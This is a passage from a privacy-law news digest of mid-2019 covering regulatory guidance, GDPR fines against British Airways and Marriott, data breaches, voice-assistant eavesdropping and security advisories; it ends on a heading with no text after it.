On July 3 the ICO published new guidance on the use of cookies and a related “myth-busting” blog post “Cookies – what does ‘good’ look like?”. Some of the “new” guidance really just repeats existing guidance, but other aspects may require organizations to review their current practices. This all comes hot on the heels of the ICO updating its own mechanism for obtaining consent to cookies on its website last week. The updated ICO guidance also follows the CNIL’s recent statement that it will issue new guidelines on cookies in two phases in the next 6 months [read English translation]: an update over the summer to amend its current guidance and rule out the use of implied consent to place cookies on users’ devices; and a consultation at the end of the year followed by new guidelines on how to obtain consent for the use of cookies (see summary). It seems likely that some or all of this national guidance may have to be revised yet again when the proposed ePrivacy Regulation [“Regulation on Privacy and Electronic Communications”] finally is agreed, although discussions on the proposal continue with no end currently in sight. The remainder of this post summarizes key points [of the ICO guidance], including in relation to when sites need to obtain consent, how to obtain consent, and when the rules apply to non-EU sites. [Inside Privacy (Covington) | Cookie consent – What “good” compliance looks like according to the ICO | Cookie Compliance: How can companies get it right when the regulator does not?]

UK – ICO Fines British Airways a Record £183M Over GDPR Breach that Leaked Data from 500,000 Users

On July 8 the U.K.’s Information Commissioner announced that it has fined British Airways and its parent International Airlines Group (IAG) £183.39 million [that’s $301 million Cdn or $230 million US as of this date] in connection with a data breach that took place last year that affected 500,000 customers browsing and booking tickets online [read OIPC announcement here & BBC extended coverage here]. The fine — 1.5% of BA’s total revenues for the year that ended December 31, 2018 — is the highest-ever that the ICO has leveled at a company over a data breach (previous “record holder” Facebook was fined a mere £500,000 last year by comparison) the fine is related to infringements of the General Data Protection Regulation [GDPR] The incident involved malware on BA.com that diverted user traffic to a fraudulent site, where customer details were subsequently harvested by the malicious hackers. The ICO said that it found “that a variety of information was compromised by poor security arrangements at BA, including log in, payment card, and travel booking details as well name and address information.” BA notified the ICO of the incident in September, but the breach was believed to have first started in June. Since then, the ICO said that British Airways “has cooperated with the ICO investigation and has made improvements to its security arrangements since these events came to light.” Market reaction was swift with IAG seeing volatile trading in London, with shares down 1.5% at the moment. And it it sounds like BA will try to appeal the fine and overall ruling. In a statement to the market [read here], the two leaders of IAG defended the company and said that its own investigations found that no evidence of fraudulent activity was found on accounts linked to the theft. Alex Cruz, British Airways chairman and chief executive said: “We are surprised and disappointed in this initial finding from the ICO. British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused.” Willie Walsh, International Airlines Group chief executive, said: “British Airways will be making representations to the ICO in relation to the proposed fine. We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals.” [TechCrunch | UK regulator to hit British Airways with record fine over 2018 hack | A Huge Data Breach Fine Against British Airways Is a Warning to Global Execs | Intention to fine British Airways £183.39m under GDPR for data breach |  British Airways faces record £183m fine for data breach | UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt | GDPR: Record British Airways fine shows how data protection legislation is beginning to bite |  GDPR: British Airways faces record £183m fine for customer data breach | British Airways fined $229 million under GDPR for data breach tied to Magecart | Post-Data Breach, British Airways Slapped With Record $230M Fine]

UK – ICO Fines Marriott £99M GBP for GDPR violations

The U.K. Information Commissioner’s Office issued a notice of its intention to fine Marriott International 99 million GBP for violations of the EU General Data Protection Regulation related to its November 2018 data breach [Marriott notice]. The ICO released the statement today in response to a filing Marriott made with the U.S. Securities and Exchange Commission. An ICO investigation found Marriott did not take the proper precautions when it acquired the Starwood hotels group, whose systems were compromised in 2014, when Marriott acquired the group in 2016. Marriott will have a chance to make representations to the ICO over its findings. The announcement comes shortly after the ICO issued a similar notice to British Airways for GDPR infractions. [ICO.ork.uk | NakedSecurity (Sophos) | Marriott/Starwood Data Breach: ICO intention to issue another big £99 million ‘mega fine’ | ICO Announces $124 Million Fine for Marriott International following Data Breach]

EU – EDPB Issues Best Practices for Video Surveillance

The EU Data Protection Board public consultation on guidelines for personal data processing through video devices: Comments can be submitted until September 6, 2019. Highlights: Implement data protection by design and default as soon as surveillance is planned (default privacy settings, built-in privacy enhancing technologies), use a combination of methods to ensure transparency (warning signs and complete information sheets), and implement risk mitigation measures (encryption, compartmentalisation, effective raw data deletion); do not implement surveillance for fictional or speculative protection of property or people (there must be real, hazardous situation), or condition service access on acceptance of biometric processing. [EDPB – Guidelines 3-2019 on Processing of Personal Data Through Video Drives]

EU – German State Bans Office 365 in Schools over Privacy Concerns

The German state of Hesse has banned the use of Microsoft Office 365 in its schools, citing privacy concerns. The Hessian data protection commissioner wrote that using the cloud suite could expose student and teacher information to US officials. Microsoft Office 365 sends telemetry data to the US; those data have been found to contain all sorts of information, from system diagnostics to sentences lifted from documents. Sources: arstechnica.com: Office 365 declared illegal in German schools due to privacy risks | www.zdnet.com: Microsoft Office 365: Banned in German schools over privacy fears

EU – CNIL Puts More Pressure on the Adtech Sector

Last year, the French Data Protection Authority [CNIL] issued a formal notice against four companies in the adtech sector, namely Fidzup, Singlespot, Teemo and Vectaury, ordering them to comply with the GDPR [for detail on this, read here]. The CNIL eventually dropped its investigation against these companies after concluding that they had made sufficient efforts to comply with the GDPR. This was just the premise of what is to come. On 28 June 2018, the CNIL issued a statement on its website which says in bold letters that online advertising is a “top priority” for 2019 [read in French here & English translation here]. This leaves little room for doubt. The CNIL is not done with the ad tech business and, on the contrary, is just warming up. [The remainder of this post posits what the ad tech sector should expect in 2019 on this front] [Privacy, Security and Information Law (FieldFisher)]

EU – Irish DPC Assessing Possible Google Data Breach

The Irish Data Protection Commission is weighing whether it will launch an investigation into a possible data breach of Google. The tech giant filed a data breach notification to the DPC last week following reports out of Belgium that contractors had been able to listen to users’ audio from Google Assistant. “We just learned that one of these language reviewers has violated our data security policies by leaking confidential Dutch audio data,” Google said in a blog post responding to the Belgian reports. “Our security and privacy response teams have been activated on this issue, are investigating, and we will take action. We are conducting a full review of our safeguards in this space to prevent misconduct like this from happening again.” [Bloomberg]

UK – ICO’s Regulatory Sandbox Points to a Future of Pro-Active Engagement

As companies continue to grapple with interpreting how the GDPR’s principles apply to their own businesses, in particular contexts, there is a growing need for data protection regulators to provide clarity on the practical application of the regulation. In the UK, the Information Commissioner has recently taken steps to address these concerns through the announcement of a ‘Regulatory Sandbox’. Sandboxes offer a formal structure for constructive engagement between a regulator and the parties being regulated; allowing for collaboration and the exchange of ideas. The ICO intends to use it to support organisations that are looking to use personal data in innovative ways through the use of new technologies and approaches. The scheme is open to companies ranging from multi-national organisations to start-ups. It offers the opportunity to receive access to free and professional expertise and support from the ICO on complying with the GDPR and UK Data Protection Act 2018 during the course of developing products and services. In the immediate term the Sandbox will be limited to approximately ten organisations that are selected from a pool of applicants [the application period is now closed]. These organisations will participate in the beta phase which is due to run from July 2019 until September 2020. During this period the ICO has committed to offering assistance with concept design and prototyping, informal supervision of testing processes and a series of drop-in workshops. Once a participant’s involvement concludes, they can request that the ICO provide a statement of regulatory comfort which aims to provide assurances regarding the product or service’s compliance with data protection laws. The expectation is that, within the next 12-18 months, the ICO’s scheme will be rolled out to a much wider population of organisations. Applicants will be prioritised based on certain eligibility criteria, namely the public benefit offered by the proposal, the ability to demonstrate that the product or service is genuinely innovative (and not just business as usual) and the organisation’s fitness to participate. This post also discusses: 1) the Sandbox as alternative approach to regulatory engagement; and 2) How sandboxes have worked in other industries. [Chronicle of Data Protection (Hogan Lovells)

FOI

CA – OIPC SK Updates Its Dictionary

The Office of the Saskatchewan Information and Privacy Commissioner has updated its dictionary of common terms and phrases regarding access requests used. Some of the terms and phrases commonly used in requests under FOIP, LA FOIP and HIPA have been updated, including “accurate” (provide sufficient and correct information), “complete” (be comprehensive and not leave any gaps in responses), and “open” (be transparent about how decisions are made, searches conducted and explain confusing information). [OIPC SK – Blog – Our Dictionary Has Been Updated – the Dictionary]

Health / Medical

CA – Smartphone Recordings Creating Headaches in the ER

According to a new study by Dr. James Stempien, provincial head of emergency medicine in the Saskatchewan Health Authority and three colleagues [see: Self-documentary in the emergency department: Perspectives on patients recording their own procedures – abstract & access here] more people are asking to record their own emergency procedures, a self-documentary trend that’s creating controversy among medical staff. The study found that most patients (62%) believed they should be allowed to video record their emergency procedures, versus 28% of emergency department (ED) doctors and nurses. “Contrary to patients’ views, clinicians were not in favour of allowing audio or video recordings in the ED,” they reported in the Canadian Journal of Emergency Medicine. Doctors had concerns around consent, staff and patient privacy, and covert recordings and legal issues. They worried that patients might use the video against them if they were unhappy with their care. (The recording could be considered part of the medical record.) Some worried about performance anxiety, though the researchers looked for, but couldn’t find, research as to whether doctors perform worse if they know they’re being recorded. [National Post]

Horror Stories

CA – More Than 50K Desjardins Members Sign Petition Demanding New SINs

More than 50,000 people have signed a petition demanding new social insurance numbers in the wake of a massive data breach at Desjardins Group. This comes after a Desjardins employee with “ill-intention” collected the data of nearly three million people and businesses. He then shared that data with others, officials revealed in late June [read company PR’s here & here]. The leaked information includes names, addresses, birth dates, social insurance numbers, email addresses and information about transaction habits, but no passwords, security questions or personal identification numbers. Still, people are worried and that worry will last a lifetime if nothing is done because identities can be stolen at any time, said Pierre Langlois. That’s why he launched an online petition calling on the government to issue new SINs to all of those affected. “We ask that the government propose a quick solution to this problem, which may include the replacement of the social insurance number of all those who have been victims of this theft, which are known and easily identifiable,” the petition says. Replacing the stolen SINs would be the “least the Canadian government could do to help restore some peace of mind to the victims,” it continues. The Government of Canada is committed to protecting social insurance numbers against fraud and misuse, as well as protecting the privacy of Canadians, according to a spokesperson for the minister of families, children and social development, Jean-Yves Duclos. Duclos is not accepting or refusing the petition’s request at this point. “We believe that any security breach affecting SIN information is very serious,” wrote the spokesperson in an email to Radio-Canada. “Our government is in communication with the Autorité des marchés financiers (AMF) to provide all the necessary support on this file.” [CBC News | Desjardins offers more protection to data theft victims | Desjardins says personal info of 2.9 million members shared illegally by employee | Personal data of 2.7 million people leaked from Desjardins]

Identity Issues

WW – NIST Publishes Considerations for Emerging Identity Management Systems

The US National Institute of Standards and Technology (NIST) discussed blockchain identity management systems (IDMSs) in a new paper. The white paper highlights relevant security and privacy considerations, such as private data leaks, metadata tracing, flawed smart contracts, and private key compromise, and offers mitigation protocols for identity management (e.g., user-friendly identity wallets, challenge response protocols, and encryption). [NIST – Cybersecurity White Paper Draft – A Taxonomic Approach to Understanding Emerging Blockchain Identity Management Systems]

US – IP Address: NY Court Finds No Expectation of Privacy

A New York District Court considers if IP address information obtained by law enforcement must be suppressed. Law enforcement did not need a warrant to obtain IP address information about a suspect from a telecom; the cellphone app that provided the IP address information was installed by the suspect, and did not allow for tracking outside his home, or surveillance of his daily movements. [USA v. Lloyd Kidd – 2019 U.S. Dist. LEXIS 114627 – US District Court for the Southern District of New York

US – Mistaken Identifications Raise Privacy Concerns

There are a variety of home surveillance tools that provide homeowners a sense of security when they’re not at home. The downside to the surveillance is that some people have been mistakenly identified as criminals. In Ohio, a teenager was mistakenly identified as a thief after taking a package off a neighbor’s porch. The homeowner posted images of the teenager on social media and reported the incident to the police. It turns out the teenager was picking up a package delivered to the wrong home. One case resulted in litigation — the Ohio Supreme Court recently heard arguments about a CBS affiliate who aired a news story and mistakenly identified three siblings as “robbers” based on images pulled from park surveillance cameras. The affiliate refused to air a retraction, and the family sued the station. [Government Technology]

Law Enforcement

US – Miami Police Body Cam Videos Up for Sale on the DarkWeb

According to Jason Tate, CEO of Black Alchemy Solutions Group a terabyte of videos from Miami Police Department body cams has been found sloshing around online for sale. The horde of videos was stored in unprotected, internet-facing databases. Besides Miami Police, there’s video leaking from city police departments “all over the US”, he said. Miami Police Department removed the videos from public access after Tate notified them about his findings. But it was publicly accessible for at least a number of days. That gave ample opportunity for hackers to copy videos from the databases and potentially sell them. A spokesperson for Miami PD told The Register that the department is still looking into the claims and wouldn’t comment until it completed its review. [Naked Security (Sophos) | Cop a load of this: 1TB of police body camera videos found lounging around public databases]

WW – 83% of Readers Don’t Wipe Their Phones Before Travel

Many people say they travel internationally with potentially sensitive information on their phone — but Toronto lawyer Craig Penney says there’s no reason to do so. “I know many lawyers have chosen to avoid crossing the border with client information. There is no reason to,” says Toronto lawyer Craig Penney in an email to Law Times. “You can store it in a secure cloud and access it later if needed. Better safe than sorry, I say.” Nearly 83 per cent of readers in a recent Law Times poll said they do not wipe all information off their devices before leaving Canada. A little over 17 per cent of readers told Law Times they do scrub their phones, laptops or tablets. Penney acted on a recent case, R. v. Singh, 2019 ONCJ 453, that dealt with the issue of privacy at the U.S.-Canada border. Justice Elaine Deluzio wrote in the decision, which involved a border agent searching a recent graduate’s phone for child pornography: “The evidence establishes that the Charter infringing state conduct in this case is serious, longstanding and systemic,” Deluzio wrote that border officers have broad search powers through the Customs Act and the Immigration and Refugee Protection Act. Nevertheless, Canada Border Services Agency rules bars officers from searching devices “for the sole or primary purpose of looking for evidence of a Criminal Code offence. And yet that is exactly what happened in this case and happens routinely in cases when Border Officers find evidence of child pornography on cell phones and other devices.” Penney says: “For most of us, our phones are our primary communication and info storage device; for some, it’s the only such device. If you wanted to learn about someone, and you could access one thing belonged to her, what would it be — her phone, correct?” The Federation of Law Societies of Canada recently released guidelines for lawyers to deal with these privacy at the border [see here & 9 pg PDF here – also see other related FLSC articles here]. The FLSC report said firms should create a policy about lawyers and staff who are travelling internationally with smartphones or laptops that contain confidential data, and that travel policies should be detailed in their retainer letter. Some firms provide separate “clean” laptops and phones for travel, the FLSC said in the report. It also advises lawyers to keep phones on airplane mode during the immigration process and to delete cloud-based apps, contacts and calendars before crossing the border. Penney says that lawyers must keep abreast of policies that may embolden border officers. “For lawyers, this means we must be cautious in what we have in our phones when we cross the border,” he says. [Law Times | U.S. border hassles: Tips for navigating a difficult situation | Canada Border Services Agency officers confiscate lawyer’s phone and laptop after he refuses to give up passwords | “Your phone is not safe at the border,” advocates warn after man’s electronic devices seized at Pearson Airport | Canada Border Services seizes lawyer’s phone, laptop for not sharing passwords]

Location

US – T-Mobile Claims Customers Unable to Sue for Disclosing Location Data

A class-action claim against T-Mobile for location data disclosures is being held up in federal court after the phone carrier said it previously agreed to arbitrate all disputes to avoid a trial. T-Mobile filed a motion at a U.S. District Court in Maryland to either dismiss or stay the matter, saying “plaintiffs are contractually required to arbitrate individually, rather than litigate their claims in federal court, much less in a putative class action.” The motion is in reference to the clause in T-Mobile’s terms and conditions that requires individual arbitration unless customers opt out, which they can do during a 30-day window after opening their account. [MediaPost]

Online Privacy

WW – More Than 1K Android Apps Collect Data Even When Permission Is Denied

Researchers from the International Computer Science Institute found more than 1,000 Android apps gathers data from devices “even after people explicitly denied them permission.” The apps used workarounds hidden in code that took personal data from Wi-Fi sources and metadata stored in phones, and in some cases accessed unprotected files on a device’s SD card. Google and the Federal Trade Commission were notified about the issues last September. Google said the issues would be addressed with the release of Android Q later this year. The full details of the 1,325 apps involved will be released in August. [CNET]

WW – Apple Users Warned About iOS 13 Security and Privacy Problem

When the “Sign in with Apple” functionality to appear as part of iOS 13 was announced at the Worldwide Developers Conference (WWDC) back on June 3, it was met with broad approval from Apple users. After all, what’s not to like about having an alternative to signing in to applications and services via your Facebook, Google, or Twitter account? It turns out, truth be told, quite a lot. Just how much depends upon whom you are talking to, of course. The OpenID Foundation (OIDF), whose own OpenID Connect platform shares much in common with the proposed Apple solution and counts Google, Microsoft and PayPal amongst its members, is edging towards the not so keen side of the fence … In a June 27 open letter addressed to Craig Federighi, senior vice-president of software engineering at Apple, Nat Sakimura, OIDF chairman, begins with some faint praise regarding Apple’s “efforts to allow users to log in to third-party mobile and Web applications with their Apple ID using OpenID Connect.” It very quickly goes downhill from there, however. [Forbes]

FW – Facebook Launches Ad Transparency Tool

Facebook launched a new transparency tool earlier this week that tells users why particular ads appear in their newsfeed. The new feature, “Why Am I Seeing This Ad?” also tells users how the ad is linked to an ad agency or data broker and how to opt out of ad campaigns ran by third parties. “I think it is a good evolution of our transparency tools, and what we’re doing is listening to people’s feedback,” Facebook Director of Product Management Rob Leathern said. The tool will be rolled out to all users soon. [Buzzfeed News]

UK – CMA Says New Watchdog May Be Needed to Monitor Growth of Digital Platforms

The U.K.’s Competition and Markets Authority says a new regulator may be needed to monitor the “growing power of digital platforms.” The CMA launched an investigation into how online platforms use data to boost advertising revenue and market power. The competition authority is also considering a number of measures designed to increase consumer protection, such as a block on tech giants from sharing user data between apps. The CMA is also expected to review proposals for a new regulatory body with powers of enforcement. The CMA is seeking comments through July 30 and expects to publish a final report next year. [Financial Times]

Privacy (US)

US – FTC Commissioners Approve $5 Billion Facebook Settlement

The US Federal Trade Commission (FTC) has voted to approve a settlement with Facebook that fines the company US $5 billion over privacy issues related to the Cambridge Analytica scandal. The investigation centered on whether the fact that the information was obtained by CA violated a 2012 consent decree with the FTC under which Facebook promised to better secure user data. The matter is now in the hands of the Justice Department’s civil division to be finalized. There are likely additional terms to the settlement but they have not been made public. Sources: www.wsj.com: FTC Approves Roughly $5 Billion Facebook Settlement | www.scmagazine.com: Facebook to pony up $5 billion in FTC settlement  | arstechnica.com: Facebook’s FTC fine will be $5 billion—or one month’s worth of revenue]

US – Privacy Law Hampers State-to-State Exchanges of Problem Drivers: DMV

According to a Department of Safety spokesman [Strategic Communications Administrator] Michael Todd. A six-year-old law [RSA 260-14-a] designed to prevent sharing of motor vehicle records with other states and the federal government prohibits New Hampshire from easily exchanging information about problem drivers with other states. While information is still exchanged, it is not done in a method that would violate a 2013 law that prohibits providing DMV database records and extracts that contain personally identifiable information with state or federal governments. Todd would not provide detailed information about the systems that NH Division of Motor Vehicles uses to exchange information with other states saying: “It’s not a simple conversation. At this time, I can’t get into details. Most of the questions are not going to have a simple yes/no answer.” He noted that Gov. Chris Sununu ordered a review of New Hampshire’s tracking and notification system of problem drivers following the June 21 accident that killed seven motorcyclists in Randolph Massachusetts [read coverage]. The pickup truck driver, Massachusetts resident Volodymyr Zhukovskyy, should have had his commercial driver’s license suspended, but Massachusetts did not properly log an impaired driving incident in Connecticut from the previous month. Last week, Massachusetts officials announced that Registry of Motor Vehicle workers stopped processing out-of-state violations beginning in March 2018, and 53 bins of unopened mail with thousands of notices were discovered at a records room at the Quincy office of the Registry of Motor Vehicles (RMV). The chairman of the New Hampshire House Transportation Committee said that law was only intended to prevent fishing expeditions involving broad swathes of data [not information about dangerous or suspended drivers]. Indeed, the law contains several [explicit] exemptions that allow for sharing as per: 1) The National Driver Register and the Problem Driver Pointer System; 2) The Commercial Driver License Information System; 3) A national system used by law enforcement and a national system to compile information about automobile titles; and 4) Any state-by-state system used to verify information from applicants for driver licenses and ID cards. Moreover, American Association of Motor Vehicle Administrators [AAMVA] maintains a state compact system to track driver licenses and information about non-resident violators. New Hampshire joined the non-resident violator compact in 1982 and the driver license compact four years later, according to the AAMVA website. [New Hampshire Union Leader]

US – Conference of Mayors Passes Resolution Not to Pay Ransomware Demands

The US Conference of Mayors has passed a resolution stating that it “stands united against paying ransoms in the event of an IT security breach.” Baltimore Mayor Jack Young said that paying ransoms encourages the perpetrators and others to launch more attacks. Sources: www.scmagazine.com: U.S. mayors resolve to no longer pay ransomware attackers | statescoop.com: Mayors pass resolution against paying ransomware ransoms]

US – FTC Mulls Disabling YouTube Ads to Protect Against Child Privacy

On July 1 the chairman of the Federal Trade Commission suggested that YouTube disable ads on certain content creators’ channels to limit the collection of data from children under 13 without parental consent [read Bloomberg coverage]. This was a counter response to a proposal by YouTube — which is facing an FTC probe after being accused of illegally gathering data on children [read T.D. coverage] to move all children’s content onto a separate platform [read WSJ coverage]. The Campaign for a Commercial-Free Childhood [CCFC] and the Center for Digital Democracy [CDT], the two groups the FTC reportedly contacted to talk through disabling ads on YouTube, wrote a letter on 3 July saying it isn’t “clear whether turning off interest-based advertising actually stops the data collection and tracking of the child” through the Google Marketing Platform [read 12 pg PDF letter]: “We are concerned about any remedy that would allow children’s content to remain on the main YouTube site and shift the burden of responsibility to content creators to opt out of ‘interest-based’ advertising”. However, according to Dylan Collins, chief executive officer of SuperAwesome [see here] moving all kids content to a separate platform may not be enough to solve YouTube’s problem: “Any product labelled as ‘kids’ simply won’t attract kids over the age of eight,” said Collins. “Additionally, the content that kids watch on YouTube today isn’t obviously ‘kids’ content [such as] sports videos and animal videos. So while it’s a good step, it doesn’t solve the issue of kids on YouTube.” He added that if YouTube shifts liability to content creators, then the majority will not self-identify as children’s content owners in order to continue monetizing their videos. [The Drum | Bloomberg]

US – 33 Organizations Ask Fla. Governor to Halt School Safety Database Plans

The Future of Privacy Forum and 32 organizations have sent a letter to Florida Gov. Rick DeSantis calling for a “halt” to the state’s proposed school safety database, according to a press release. The letter comes a month after FPF published guidance on school safety and student privacy and was prompted by a recent Education Week report on Florida’s progress on the database, which would “track students who might be considered threats.” The organizations wrote that the database “represents a significant safety risk” due to the collection of “highly sensitive information without a clear, evidence-based rationale for inclusion.” Meanwhile, MediaPost reports lawyers for the Center for Digital Democracy and the Campaign for a Commercial-Free Childhood penned a letter to the U.S. Federal Trade Commission asking it “insist Google remove all children’s content from YouTube in order to settle allegations that the company violated privacy laws.” [FerpaSherpa]

US – Fla. Gov. to Go Forward with School Safety Database Despite Criticism

Gov. Ron DeSantis, R-Fla., has denied recent requests to terminate the state’s school safety database and will continue to gather data that tracks students’ mental health. DeSantis put out a statement explaining the purpose and use of the database were being misinterpreted by the coalition of 33 organizations. DeSantis said the database functions as “a tool for threat assessment teams to evaluate the seriousness of individual cases and is not being used to label students as potential threats.” In response, the coalition criticized DeSantis’ attempts at reassurance, noting that the governor failed to fully clarify how the database will be used and what kinds of data will be collected. [Bay News]

US – Md. School District to Begin Annual Deletion of Old Student Data

Maryland’s Montgomery County Public Schools have taken up an annual purge of its databases that contain data of more than 162,000 students. Montgomery County is the first district in the state and one of just a handful of districts nationwide to take up the clearing venture. The “Data Deletion Week” will clear student internet histories from servers run by Google, Apple and GoGuardian, which offers services to help teachers manage classrooms and monitor students. GoGuardian CEO Advait Shinde said the purge “is a positive way to create a partnership between parents and schools on the management of data on school accounts that is used to provide a better and safer online learning experience.” [The Wall Street Journal]

RFID / IoT

US – NIST Publishes IoT Cybersecurity Guidance

Seemingly every appliance we use comes in a version that can be connected to a computer network. But each gizmo we add brings another risk to our security and privacy. So before linking your office’s new printer or coffee maker to the internet of things (IoT), have a look at an informational report from the National Institute of Standards and Technology (NIST) outlining these risks and some considerations for mitigating them. Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks (NISTIR 8228) [see here] is the first in a planned series of documents NIST is developing to help IoT users protect themselves, their data and their networks from potential compromise. Developed by the NIST Cybersecurity for IoT Program over more than two years of workshop discussions and interaction with the public, NISTIR 8228 is primarily aimed at federal agencies and other big organizations that are incorporating IoT devices into their workplace — organizations that may already be thinking about cybersecurity on a large-scale, enterprise level. Larger organizations may already be using the Cybersecurity Framework and NIST SP 800-53 Rev. 5. NISTIR 8228 takes the security and privacy focus from these other documents and considers it in the context of IoT products, from thermostats to voice-operated devices, which may not have traditional interfaces such as a keyboard. The report is a companion document to the Cybersecurity Framework and SP 800-53 Rev. 5. However, NISTIR 8228 offers only advice; none of its contents are requirements under the Federal Information Security Management Act (FISMA). After distinguishing IoT devices from conventional computers and outlining the type of risks they carry, the authors suggest three high-level risk mitigation goals:

  1. Protect device security, i.e., prevent an IoT device from being used to conduct attacks;
  2. Protect security of data, including personally identifiable information; and
  3. Protect individuals’ privacy.

In the near future, NIST plans to release a core baseline document that aims to identify fundamental cybersecurity capabilities that IoT devices can include. The document will have all IoT devices in mind, including those for individual users and home networks. According to Mike Fagan, a NIST computer scientist and one of the authors of the NISTIR 8228 report: “We plan to release a draft of the baseline document for public comment in July, and then we will hold a workshop on August 13 [read notice here] where we will gather feedback. We’d like to help all IoT users be aware of the risks to their security and privacy and help them approach those risks with open eyes.” [NIST News (National Institute of Standards and Technology | Oregon’s New IoT Law ]

CA – Canada Publishes New Drone Regulations

In Canada, the drone industry has nearly doubled in size every two years over the past decade. With that boom, Canadian regulators have been grappling with many of the same questions that the U.S. Federal Aviation Administration (FAA) has been struggling with as well — how do you safely incorporate drones into the airspace? To address this issue, Canada released, and made effective, regulations amending the Canadian Aviation Regulations for Remotely Piloted Aircraft Systems (Regulations). These new Regulations cover small drones that weigh between 0.55 lbs. and 55 lbs., and that are operated within the operator’s visual-line-of-sight. The operation of a drone over 55 lbs. requires a Special Flight Operations Certificate (SFOC). How do these new Regulations compare to the regulations effective in the U.S.? For example:

  1. All drones must be registered with Transport Canada and marked with a registration number regardless of the operator intent (i.e. commercial and hobbyists both must register);
  2. All drones must be flown at an altitude of less than 400 feet;
  3. Drones may not be flown over or within a secured perimeter established by a public authority in response to an emergency or “advertised events,” such as outdoor concerts, festivals or sporting events, unless the operator is granted a SFOC;
  4. Drone pilots must be at least 14 years old and complete an online knowledge exam, but for advanced operations (i.e. operations within controlled airspace; closer than 30 meters to a bystander; within three (3) nautical miles from an airport), the pilot must be at least 16 years old; and,
  5. For certain advanced operations, the drone must meet RPAS (i.e. Remotely Piloted Aircraft Systems) Safety Assurance standards before being flown (i.e. technical requirements).

There are many similarities between the Canadian and U.S. regulatory requirements and restrictions. However, one notable difference between the regulations is that the new Canadian regulations permit flights over people (defined as operations that are less than five (5) meters horizontally and at any altitude) provided that the manufacturer of the drone makes required declarations and that other requirements for “advanced operations” are complied with as well. Additionally, the Canadian regulations do not distinguish between recreational or commercial drone uses, and require operators to demonstrate flight proficiency for advanced operations. The FAA is working towards a rule for flights over people, but some of these other differences may be far down the road here. [Data Privacy + Security Insider (Robinson+Cole)]

WW – Google Employees Are Eavesdropping, Even In Your Living Room

Not everyone is aware of the fact that everything you say to your Google smart speakers and your Google Assistant is being recorded and stored. But that is clearly stated in Google’s terms and conditions. And what people are certainly not aware of, simply because Google doesn’t mention it in its terms and conditions, is that Google employees are systematically listening to audio files recorded by Google Home smart speakers and the Google Assistant smartphone app. Throughout the world, people at Google listen to these audio files to improve Google’s search engine. VRT NWS was able to listen to more than a thousand excerpts recorded via Google Assistant. They were provided by someone who works for a Google subcontractor and focussed on Dutch and Flemish speaking users. In these recordings we could clearly hear addresses and other sensitive information. This made it easy for us to find the people involved and confront them with the audio recordings. Most of these recordings were made consciously, but Google also listens to conversations that should never have been recorded at least 150 of the aforementioned 1000, some of which contain sensitive information as well as recordings of a sexual and/or violent nature. He let us take a look at the system that collects audio via Google Assistant. Thousands of employees worldwide use this system to listen to audio excerpts. In Flanders and Holland, around a dozen people listen to local recordings. Google subcontracts that task to outside professionals. They log in to a secure part of the tool that has a list of the audio excerpts they have to analyse. Knowing that people who work for Google indirectly are listening to such recordings raises questions about privacy. In order to avoid excerpts being automatically linked to a user, they are disconnected from the user’s information. They delete the user name and replace it with an anonymous serial number. But, as shown in one of the videos accompanying this article, it doesn’t take a rocket scientist to recover someone’s identity; you simply have to listen carefully to what is being said. What’s more, if they don’t know how it is written, these employees have to look up every word, address, personal name or company name on Google or on Facebook. In that way, they often soon discover the identity of the person speaking. In a reaction on the VRT’s report, Google admits that it works with language experts worldwide to improve speech technology. “This happens by making transcripts of a small number of audio files”, Google’s spokesman for Belgium says. He adds that “this work is of crucial importance to develop technologies sustaining products such as the Google Assistant.” Google states that their language experts only judge “about 0.2 percent of all audio fragments”. These are not linked to any personal or identifiable information, the company adds (also read Google’ blog post response & justifications here). Google is not the only company that works this way. In April, the Bloomberg news agency revealed that American internet giant Amazon also does it. Bloomberg also had evidence that, just like Google, Apple subcontracted people to train its well-known Siri search assistant. [vrtNWS (Belgian public broadcaster) | Google is investigating the source of voice data leak, plans to update its privacy policies | Yep, human workers are listening to recordings from Google Assistant, too | How Amazon, Apple, Google, Microsoft, and Samsung treat your voice data | Amazon Workers Are Listening to What You Tell Alexa]

Security

CA – Canadian Centre for Cyber Security Issues Best Practices for Bluetooth

The Canadian Centre for Cyber Security has issued guidance on Bluetooth technology.

  • Avoid transferring sensitive information or passwords over Bluetooth connections
  • Turn off “discover mode” when not using
  • Remove lost or stolen devices from the pairing list
  • Always verify that a listed device is known and trusted before pairing with it, and
  • Avoid pairing devices in rental cars (where one is paired, delete stored data and devices upon return).

Bluetooth-specific vulnerabilities:

  • Bluejacking: a threat actor sends unsolicited messages to the Bluetooth-enabled mobile devices: they can connect to and remotely control the device if: the message is responded to; or they are added to the recipient’s address book.
  • Bluebugging: a threat actor poses as a device (e.g. headphones): PI on the connecting device becomes available to the actor once connected to the spoofed device.
  • Car whisperer: this software allows a threat actor to send or receive audio from the car kit installed in the vehicle: if exploited, threat actors could eavesdrop on conversations by receiving audio from the car microphone.
  • Crackle: a threat actor exploits flaws in the pairing process that allows key recovery so that devices can be accessed.
  • GATTack: an attacker creates a man-in-the-middle attack to intercept, clone, block or change messages

[Canadian Centre for Cyber Security – Using Bluetooth Technology]

Smart Cities and Cars

UK – London is Tracking Passengers on the Underground

London’s subway has become the latest transportation agency to use location data collected from people’s smartphones in a bid to improve services. Transport for London, which operates the Tube, began collecting data in its stations this week, in order to determine how people are moving through the system and how crowded trains and platforms are. It said passengers will benefit as they will get more alerts about delays and congestion later this year. Extra trains could also be added on routes where the data indicates trains are especially congested. It’s become increasingly common in recent years for transportation organizations worldwide to use smartphone data to better plan services. They say digital data offers insights that greatly surpass previous methods, such as user surveys. But transportation experts believe London may have the first public transportation system to track and use individual trip data in real time. Given how large a system London operates, other cities may follow suit if the project succeeds. The practice also raises concerns about user privacy, unwanted tracking, potential hacks and the misuse of data. [CNN]

CA – Privacy Complaint Filed Over Tracking of Drivers’ Data by Their Cars

